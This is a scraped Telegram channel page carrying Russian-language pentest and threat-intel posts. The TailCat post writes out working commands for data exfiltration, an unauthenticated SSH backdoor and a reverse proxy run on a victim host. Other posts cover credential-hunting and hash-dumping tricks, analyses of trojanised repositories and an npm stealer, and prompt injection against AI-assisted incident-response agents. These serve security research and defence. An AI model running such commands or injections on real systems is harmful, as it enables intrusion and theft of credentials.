s0ld13r ch.
前往频道在 Telegram
Blog about Pentest, TI/TH, OPSEC & other security stuff Questions: @s0ld133r Blog: https://s0ld13r.kz TIP: https://threatintel.kz LoLAI: https://lolai-project.github.io/ For educational purposes only 🧠
显示更多2 582
订阅者
+824 小时
+447 天
+8530 天
数据加载中...
吸引订阅者
九月 '26
九月 '26
+42
在3个频道中
八月 '26
+77
在2个频道中
Get PRO
七月 '26
+100
在3个频道中
Get PRO
六月 '26
+64
在1个频道中
Get PRO
五月 '26
+65
在1个频道中
Get PRO
四月 '26
+167
在4个频道中
Get PRO
三月 '26
+167
在6个频道中
Get PRO
二月 '26
+220
在3个频道中
Get PRO
一月 '26
+156
在7个频道中
Get PRO
十二月 '25
+80
在2个频道中
Get PRO
十一月 '25
+105
在5个频道中
Get PRO
十月 '25
+148
在4个频道中
Get PRO
九月 '25
+222
在5个频道中
Get PRO
八月 '25
+131
在2个频道中
Get PRO
七月 '25
+116
在3个频道中
Get PRO
六月 '25
+81
在2个频道中
Get PRO
五月 '25
+149
在4个频道中
Get PRO
四月 '25
+774
在7个频道中
Get PRO
三月 '250
在9个频道中
Get PRO
二月 '25
+48
在7个频道中
| 日期 | 订阅者增长 | 提及 | 频道 | |
| 05 九月 | +1 | |||
| 04 九月 | +10 | |||
| 03 九月 | +10 | |||
| 02 九月 | +4 | |||
| 01 九月 | +17 |
频道帖子
| 2 | TailCat Red Team use case 😎
Несколько дней назад ребята из TailScale выпустили свой инструмент tailcat, как можно понять из названия, это аналог netcat но работающий из коробки через сеть TailScale 🤩
Первой моей мыслью стало что инструментом начнут активно пользоваться атакующие и решил расписать разные примеры применения нового "условно легитимного" софта 😃
🔢 SOCKS5 Reverse Proxy
Можно использовать машину жертвы как exit-node и через неё получать доступ к внутренней сети. На машине жертвы запускаем следующую команду:
tailcat --serve=exit-node
По умолчанию tailcat socks поднимает SOCKS5 на случайном порту и передаёт адрес и порт через переменную окружения. Чтобы не возиться с этим каждый раз, я написал небольшой wrapper под названием tcsocks, который поднимает локальный SOCKS5 на 1080 (порт можно поменять). На машине оператора запускаем:
tcsocks -q <token>
А дальше как обычно пользуемся proxychains:
proxychains -f proxy.conf -q nxc rdp 192.168.0.0/24
🔢 SSH доступ без авторизации
Tailcat также позволяет в user mode слушать SSH от пользователя, без необходимости вводить пароль, это особенно удобно если был нестабильный шелл и нужно было использовать альтернативный канал. Сперва слушаем No Auth SSH на машине жертвы:
tailcat --serve=no-auth-ssh
Далее подключаемся по токену с машины оператора:
tailcat ssh <token>
🔢 Эксфильтрация данных через pipe
Ну и классика - эксфильтрация файлов через pipe на машине жертвы запускаем:
cat secret.txt | tailcat <token>
На машине оператора запускаем:
tailcat > secret.txt
Из плюсов вижу то, что инструмент условно легитимный и работает из коробки, с открытым исходным кодом который можно кастомизировать под свои нужды 😎
💻 tcsocks: https://gist.github.com/s0ld13rr/18e2765da1831af0a656e7bb0a819e73
💻 tailcat: https://github.com/tailscale/tailcat
🧢 s0ld13r | 1 505 |
| 3 | Всем привет! Решил создать личный канал в Telegram!
Добро пожаловать!
Идейный вдохновитель и человек, который чаще всех спрашивал, когда я уже его создам — Аскар @rockyou. Аскар, держи! 😉 | 1 444 |
| 4 | Канал моего хорошего друга, рекомендую подписаться 😃 | 1 436 |
| 5 | В свете последних новостей про eGov, актуалочка 🤣😃
🧢 s0ld13r | 2 955 |
| 6 | Дампим SAM/SYSTEM через 7-Zip
Знакомая ситуация: вы на машине юзера, нужно достать хеши, но reg save или copy блокируются EDR, файлы заблокированы самой Windows, а антивирус палит известные утилиты.
Но на рабочих станциях часто установлен 7-Zip! И у него есть крутая недокументированная фича - прямое чтение диска (raw disk access).
А можно использовать и для DFIR извлекать MFT и т.д.
Чем проще и банальнее тем лучше : ) | 1 783 |
| 7 | PentestCode v0.2.4 is out 🤩
Выкатил новую версию PentestCode с несколькими улучшениями, в основном правил мультиагентную архитектуру и жесткость границ между их работой 😺
😱 Что изменилось:
• Добавил полноценный Artifact Store. Теперь PoC, сгенерированные одним саб-агентом, регистрируются в state и переиспользуются другими вместо повторной генерации
• Полностью переделал работу с engagement state. Саб-агенты получают только релевантный контекст, что заметно сократило расход токенов
• Координатор теперь реально координирует, а не пытается сам делать всю работу. Добавил рейлы, watchdog’и, лимиты и защиту от бесконечных циклов
• Усилил самокритику. Недостаточно сказать «есть root» - любой успешный результат должен подтверждаться артефактом, иначе это только suspected
• Подточил reconnaissance skills и порядок их загрузки
👩💻 Обновление:
pentestcode upgrade
P.S Еще есть куда расти дальше поэтому обратная связь, баги, кейсы успешных/провальных прогонов приветствуются 😉
🧢 s0ld13r | 1 995 |
| 8 | Supply-chain атака: EtherHiding C2 во вредоносном форке PentestCode 🕺
Пока просматривал форки своего проекта PentestCode, наткнулся на довольно странные коммиты в одном из них.
⚠️ Сразу отмечу: оригинальный репозиторий PentestCode не был скомпрометирован. Вредоносный код находился исключительно в стороннем форке
Решил разобраться, что именно туда добавили. В итоге обычная проверка форка превратилась в полноценный malware research с обширной кампанией. После нескольких этапов деобфускации выяснилось, что это не простой downloader и не очередной стилер, а многоступенчатый JavaScript-бэкдор с удалённым исполнением кода (RCE), использующий технику EtherHiding 😃
🔍 Что удалось установить:
• 4 уровня обфускации и самораспаковки;
• получение C2 через блокчейн Ethereum без единого захардкоженного IP;
• поиск C2 по транзакциям атакующего через публичные Ethereum RPC;
• декодирование IP:Port прямо из поля to;
• загрузка stage-2 → stage-3;
• несколько способов исполнения payload (spawn, eval и резервный запуск);
• скрытый запуск процессов (windowsHide, stdio: ignore);
• переход из WSL2 на Windows-хост через node.exe
Самое интересное - C2 вообще не зашит в код. Вместо этого используется Ethereum как dead-drop: новая транзакция публикует новый адрес C2, и заражённые машины автоматически начинают обращаться уже к нему. Такой подход серьёзно усложняет блокировку инфраструктур 🦍
Но дальше стало ещё интереснее - вредоносный форк принадлежит GitHub-аккаунту KumaloWilson. На аккаунте почти 200 публичных репозиториев, большинство последних - форки инструментов для специалистов по ИБ и AI-разработчиков 🙀
Среди них:
• PentestCode
• KaliGPT
• Kittysploit
• Meterless
• Nebula
• cybersentinel-ai
• AhMyth+
• и другие.
Сложилось впечатление, что злоумышленники целенаправленно троянизируют проекты, которые с высокой вероятностью будут запускать пентестеры, ресерчеры и разработчики - именно там обычно находятся SSH-ключи, GitHub Token, .env, облачные креды и криптокошельки 😎
При этом нет доказательств, что владелец аккаунта KumaloWilson является автором кампании. Не исключено, что сам аккаунт был скомпрометирован и использовался для распространения вредоносных форков 💻
Полный список IoC в комментариях, проверяйте не только то, что запускаете, но и откуда вы это клонируете 😉
🧢 s0ld13r | 1 839 |
| 9 | 🚨 WP2Shell - критический RCE в WordPress Core
Исследователи опубликовали детали уязвимости WP2Shell, которая позволяет неаутентифицированному атакующему добиться Remote Code Execution (RCE) на уязвимых версиях WordPress 👩💻
📌 Затронутые версии:
• WordPress ниже 6.8.5 - не уязвимы
• WordPress 6.9.0 – 6.9.4 - уязвимы
• WordPress 7.0.0 – 7.0.1 - уязвимы
👀 Что делать?
• Необходимо как можно скорее обновить версию CMS WordPress до версии 7.0.2 (или 6.9.5 если вы на ветке 6.9)
• Если обновиться не получиться, то можно временно заблокировать доступ к /wp-json/batch/v1 и ?rest_route=/batch/v1 на уровне WAF
⚠️ Учитывайте что могут появиться проблемы в работе сервиса и вариант с обновлением предпочтительнее
🔗 Post:
https://slcyber.io/research-center/wp2shell-pre-authentication-rce-in-wordpress-core/
🧢 s0ld13r | 1 650 |
| 10 | 🛠 Всем привет.
Я тут допилил CLI-движок для LOLCreds на Go. Называется это безобразие CredsHound.
Если коротко, это такая утилита для поиска учетных данных, ключей на хосте, которая работает по концепции Nuclei.
Из коробки она ищет:
- Пароли и API-ключи, забытые в истории терминалов (.bash_history, .zsh_history, ConsoleHost_history.txt).
- Приватные ключи SSH, конфигурации Kubernetes и токены Docker Registry.
- Артефакты Windows: пароли из файлов автоматической установки (Unattended XML), конфиги RDCMan и групповые политики с зашифрованными cpassword.
- Локальные файлы конфигурации БД вроде .pgpass или .my.cnf.
🐶 Ну и интеграция с собакой тоже есть.
Потому что просто выплевывать цветной текст в консоль скучно.
📖 Как запустить:
# установка
go install github.com/haxxm0nkey/credshound/cmd/credshound@latest
# запуск
credshound -ut
credshound .
🔗 Где исходники, Билли?
Движок: https://github.com/haxxm0nkey/credshound
Хорошей пятницы вам, держитесь там! | 1 092 |
| 11 | LegacyHive: Just another Windows LPE from NightmareEclipse
The PoC requires another standard user credentials and a third username (which can be an administrator account), if the PoC is successful, it will end up mounting the target user hive in current user classes root.
💻 LegacyHive: https://git.projectnightcrawler.dev/NightmareEclipse/LegacyHive
🧢 s0ld13r | 1 420 |
| 12 | 🅰️🅰️🅰️🅰️🅰️🅰️🅰️🅰️🅰️🅰️🅰️ 🅰️🔢❎🔢❎🔢
Выкатил ряд фиксов на PentestCode в релизе 0.2.1 (альфа). В этот раз основной фокус был не на новых фичах, а на том, чтобы сделать агента более стабильным и приблизить его поведение к работе реального пентестера (ну или не очень) 😎
• Улучшена оркестрация и управление субагентами
• Добавлена обязательная just-in-time загрузка скиллов
• Доработан TUI: теперь проще отслеживать активных субагентов
• Исправлен механизм обновлений - теперь достаточно выполнить pentestcode upgrade, чтобы обновить и самого агента, и встроенные скиллы (применимо только с v0.2.1 и последующих релизах)
Ну и, конечно, некоторые фиксы и полировки по мелочи. Я подготовил короткое демо как это примерно выглядит на данном этапе 😺
В последующих релизах постараюсь исправить и другие недочеты, чтобы пользоваться им было еще приятнее, stay tuned 😎
P.S А я напомнию что у меня есть аккаунт в X - буду рад видеть вас там в качестве подписчиков 😉 https://x.com/s0ld133rr?s=11
🧢 s0ld13r | 1 698 |
| 13 | И таааааак сойдет😅
Давно ничего не постил. За это время успел увидеть как все резко стали экспертами по мультиагентным системам, MCP, A2A и еще двадцати новым аббревиатурам которые появляются быстрее чем новые модели у OpenAI ⭕️
Но как бы то ни было, жизнь ироничная штука. В какой-то момент я тоже решил посмотреть, что вообще происходит в мире AI для Offensive Security. Перетестил разные инструменты, поковырял open-source проекты и понял, что почти везде мне чего-то не хватает: где-то архитектуры, где-то удобного workflow, где-то агент просто забывает, что было пять сообщений назад 🥱
Так появился PentestCode - форк OpenCode, заточенный под пентест. Вместо того чтобы тратить недели на TUI, авторизацию и поддержку десятков LLM-провайдеров, я решил сосредоточиться на архитектуре и воркфлоу агента 😎
Пока успел реализовать engagements со своим состоянием, общий контекст для всех субагентов, Task Graph для планирования, автоматический импорт результатов популярных инструментов, построение Attack Path и память между агентами. Сейчас проекту очень нужно много тестов, предложений и замечаний поэтому я буду очень признателен за обратную связь в лс или в issues на github 👋
👩💻 Установка:
curl -fsSL https://raw.githubusercontent.com/s0ld13rr/pentestcode/main/install.sh | bash
👀Использование:
pentestcode auth login
pentestcode # launch TUI
pentestcode -s <session-id>
💻 PentestCode: https://github.com/s0ld13rr/pentestcode
Буду рад если поставите звезду на гитхабе и поделитесь с друзьями/коллегами 😉
P.S Проект еще очень молодой поэтому могут быть недочеты за фиксом можно в лс
🧢 s0ld13r | 3 644 |
| 14 | Обнаружены подозрительные домены в зоне home[.]kg 🇰🇬
Домены
- auth.home[.]kg 🇰🇬
- vscode.auth.home[.]kg 🇰🇬
Оба домена присутствуют в Maltrail (apt_kimsuky.txt) и связаны с инфраструктурой, которую OSINT-источники относят к Kimsuky / APT43 / Emerald Sleet.
Текущие резолвы
auth.home[.]kg 🇰🇬
• IP-адрес: 80.68.237.36
• Локация / Провайдер: Польша 🇵🇱
vscode.auth.home[.]kg 🇰🇬
• IP-адрес: 153.75.247.209
• Локация / Провайдер: США 🇺🇸, Interserver (VPS)
Цель атаки
Это атака на разработчиков.
Домен vscode.auth.home[.]kg создан для имитации легитимного OAuth redirect URI Visual Studio Code. Такие домены используются для кражи токенов аутентификации у разработчиков, DevOps-инженеров и исследователей.
Важное замечание
home[.]kg 🇰🇬 — это публичная FreeDNS-зона на afraid.org. Любой может создавать поддомены. Наличие .kg не означает, что целью является Кыргызстан.
О группе Kimsuky
Kimsuky (APT43 / Emerald Sleet) — северокорейская кибершпионская группа, активная с 2012 года. Для неё характерны социальная инженерия, поддельные страницы входа и кража учётных данных у технических специалистов. | 1 217 |
| 15 | Сделал скромный вклад в IPAHound 🐕
Столкнулся с тем, что оригинальный pyproject.toml конфликтовал с новыми версиями Python 👩💻, из-за чего установка могла ломаться. Подготовил фикс и отправил Merge Request (уже принят), теперь установка должна проходить заметно проще 💃
👩💻 Установка:
curl -LsSf https://astral.sh/uv/install.sh | sh
uv tool install git+https://github.com/IPAHound/IPAHound
😎 Использование:
ipahound -s dc.soldier.local -u user.name -p 'p@ssw0rd' -o dump.json
💻 MR: https://github.com/IPAHound/IPAHound/pull/3
🧢 s0ld13r | 2 500 |
| 16 | Same Tool, Two Hats: AI Velociraptor for Attack and Defense
Всё чаще появляются отчёты об LLM-operated атаках: человек задаёт цель, а LLM помогает вести операцию - выбирает следующий шаг, интерпретирует вывод инструментов и принимает тактические решения.
Этот POC - попытка показать, как такая модель выглядит на практике с реальным DFIR-инструментом.
За основу взят mgreen27/mcp-velociraptor - MCP-обёртка над Velociraptor API: https://github.com/mgreen27/mcp-velociraptor
Изначальная идея проекта - дать DFIR-аналитику возможность работать с Velociraptor через Claude. Я посмотрел на ту же связку с другой стороны: если LLM может помогать защитнику исследовать endpoint, те же вещи могут работать и в adversary emulation. На эту мысль также натолкнул пост:
https://t.me/s0ld13r_ch/82
Velociraptor здесь интересен как dual-use инструмент: легитимный агент, подписанный бинарь, TLS-трафик, централизованный сервер и мощный язык артефактов. В defensive-сценарии это ускоряет IR. В offensive-модели тот же подход может превратиться в управляемый канал для reconnaissance, command execution и controlled file collection.
Я добавил кастомных оберток поверх оригинального MCP проекта:
- run_shell, run_powershell, run_vql_raw - выполнение команд и client-side VQL через Velociraptor.
- collect_arbitrary_file, recursive_collect - точечный сбор файлов и scoped recursive collection из заданных директорий.
- download_file, upload_file - работа с собранными файлами и controlled transfer с SHA256-verification.
Разница принципиальная: оригинальный bridge помогает LLM видеть endpoint через DFIR-артефакты. Добавленные обертки позволяют LLM инициировать действия через Velociraptor API.
В моей лабе Defensive сторона та же: IR-аналитик подключает свой Velociraptor-сервер, деплоит агент на исследуемую машину и через Claude Desktop/Claude Code проводит triage. Процессы, сетевые соединения, сервисы, scheduled tasks, Sysmon Event ID 1/3, Event ID 7045, Amcache, Shimcache и файловые артефакты читаются через один MCP-интерфейс.
Главный challenge - Prompt Injection в AI-assisted IR.
Если атакующий оставляет payload в логах, файлах, command line или staged notes, DFIR-агент может прочитать attacker-controlled content через LLM. В этот момент артефакт просто руинит исследование для IR команды...
То есть в AI-assisted IR нужно понимать как работает аналитический контур: как LLM читает артефакты, где отделяются данные от инструкций, какие действия требуют подтверждений и как логируются вызовы инструментов.
Мои Custom MCP тулы:
https://github.com/rarh1k/mcp-ai-velo-dfir
References:
Solar 4RAYS - https://rt-solar.ru/solar-4rays/blog/4559/
Sophos - https://news.sophos.com/en-us/2025/08/26/velociraptor-incident-response-tool-abused-for-remote-access/
Rapid7 - https://www.rapid7.com/blog/post/pt-identifying-and-mitigating-potential-velociraptor-abuse/
Cisco Talos - https://blog.talosintelligence.com/velociraptor-leveraged-in-ransomware-attacks/
🦔 THF
#Velociraptor #DFIR #ThreatHunting #IncidentResponse #MCP #ClaudeCode #LLM #AIForCybersecurity #AIIR #PromptInjection #RedTeam #AdversaryEmulation #DualUse #CyberSecurity #DetectionEngineering #DigitalForensics #SOC #APT #IR #THF | 732 |
| 17 | ТЗ от Заказчика на услуги по ИБ 🤣
🧢 s0ld13r | 1 692 |
| 18 | 🎖 Наша команда FR13NDS TEAM заняла 1 место на CTF KBTU 2026! 🚩
🏫 10 мая 2026 года в Kazakh-British Technical University (KBTU) в Алматы прошло соревнование CTF KBTU 2026. Организаторами соревнования выступила команда ctf_enjoyers.
💻 В соревновании приняли участие 16 команд. Участникам были предложены задания в категориях Web, Crypto, Reverse, OSINT и Misc, а также использование ИИ-инструментов, LLM/AI-ассистентов для решения заданий было запрещено.
🏆 Итоговый зачёт:
🥇 1 место — FR13NDS TEAM (6359 очков) — 300 000 тг
🥈 2 место — mimicats (4593 очка) — 200 000 тг
🥉 3 место — c1cada (3821 очко) — 100 000 тг
👏 Поздравляем всех участников, организаторов и всех, кто был причастен к проведению этого соревнования и сделал его возможным!
🌐 Telegram 🌐Instagram 🌐LinkedIn | 1 428 |
| 19 | Коротко о проблемах вайб-кодинга и безопасности 🤣
🧢 s0ld13r | 1 827 |
| 20 | BitWarden CLI скомпрометирован: новая волна Shai-Hulud 🚨
В npm пакете @bitwarden/cli (версия 2026.4.0) обнаружен троянизированный билд, замаскированный под легитный CLI. Пакет сохраняет оригинальные метаданные, но execution path переписан - при установке запускается вредоносный loader подгружающий стилер Shai-Hulud 👀
Payload разворачивается в несколько этапов: через preinstall запускается bw_setup.js, который подтягивает Bun runtime с GitHub и исполняет обфусцированный скрипт 😃
Основной функционал:
• кража dev-секретов: .npmrc, .git-credentials, .env, SSH ключи
• сбор cloud-доступов: AWS / GCP / Azure
• извлечение gh auth token и дальнейшая работа через GitHub API
• fallback через commit search (LongLiveTheResistanceAgainstMachines / beautifulcastle)
• создание репозиториев у жертвы и загрузка туда зашифрованных данных
• попытки получения секретов из GitHub Actions
Отдельно стоит отметить таргетинг .claude и MCP конфигов, у атакующего явный интерес к AI инструментам. Если пакет c версией 2026.4.0 устанавливался нужно считать хост скомпрометированным и ротировать все секреты 🏃♂️
🛡 IOC for hunts:
Сетевые индикаторы
audit[.]checkmarx[.]cx
94[.]154[.]172[.]43
https://audit[.]checkmarx[.]cx/v1/telemetry
Файлы / пакет
@bitwarden/cli 2026.4.0
bw_setup.js
bw1.js
SHA суммы
18f784b3bc9a0bcdcb1a8d7f51bc5f54323fc40cbd874119354ab609bef6e4cb
8605e365edf11160aad517c7d79a3b26b62290e5072ef97b102a01ddbb343f14
167ce57ef59a32a6a0ef4137785828077879092d7f83ddbc1755d6e69116e0ad
🔗 Report:
https://www.ox.security/blog/shai-hulud-bitwarden-cli-supply-chain-attack/
🔗 JFrog Research: https://research.jfrog.com/post/bitwarden-cli-hijack/
🔗 OpenSourceMalware:
https://opensourcemalware.com/npm/@bitwarden/cli
🧢 s0ld13r | 2 108 |
